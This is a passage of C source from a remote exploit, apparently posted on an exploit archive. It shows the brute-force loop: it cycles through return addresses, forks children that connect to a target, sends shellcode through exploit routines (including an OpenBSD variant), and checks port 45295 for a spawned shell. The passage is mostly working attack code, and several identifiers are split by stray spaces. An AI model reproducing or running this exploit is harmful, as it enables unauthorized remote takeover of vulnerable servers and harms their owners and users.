0) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (verbose == 1) fprintf(stderr, "+ socket() error.\n" ); } else { ret -= STEPS; i++; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if (verbose == 1) fprintf(stderr, "+ socket() error.\n" ); if ((ret & 0xff) == 0x00 && brute != 3) ret++; if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u nsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad dr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { if (verbose == 1) fprintf(stder r, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { if (exploit_openbsd32(sock, ret , shellcode) < 0) { if (verbose == 1) fprin tf(stderr, "+ Failed.\n"); if (sock > 2) close(so ck); if (sock2 > 2) close(so ck2); exit(-1); } } else { if (exploit_normal(sock, ret, shellcode ) < 0) { if (verbose == 1) fprintf(stder r, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (sock > 2) close(sock); if ((sock2 = socket(AF_INET, SOCK_STREA M, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } if(Connect(sock2, (char *)inet_ntoa(add r1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } exit(1); } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } # 0day.today [2024-12-25] #